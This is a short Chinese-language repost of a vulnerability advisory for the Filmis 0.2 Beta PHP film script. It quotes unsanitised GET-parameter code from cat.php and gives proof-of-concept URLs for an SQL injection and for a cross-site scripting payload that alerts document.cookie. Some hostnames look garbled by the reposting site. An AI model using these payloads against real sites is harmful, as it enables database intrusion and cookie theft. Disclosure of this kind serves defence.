Filmis 0.2 Beta多个缺陷及修复 - 网站安全 - 自学p

标题: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities

作者: M.Jock3R HdhCmsTest2cto测试数据

下载地址: http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip

测试平台: windows XP Sp2 FR

缺陷文件: cat.php

缺陷代码:

$idcat = $_GET['id'];

$nbitemparpage= "28";

if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; }

$nbd = ceil(($nb -1) * $nbitemparpage);

$amem = mysql _query("SELECT * FROM ".$prefix."film");

测试：

1/SQL注射:

http://HdhCmsTest2cto测试数据 /filmis/cat.php?nb=-1'

2/XSS :

http://HdhCmsTest2cto测试数据 /filmis/cat.php?nb=1><script>alert(document.cookie)</script>

致谢

adelsbm / attiadona / Wprojects.tk

修复：过滤

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://haodehen.cn/did11231

更新时间：2022-09-13 阅读：51次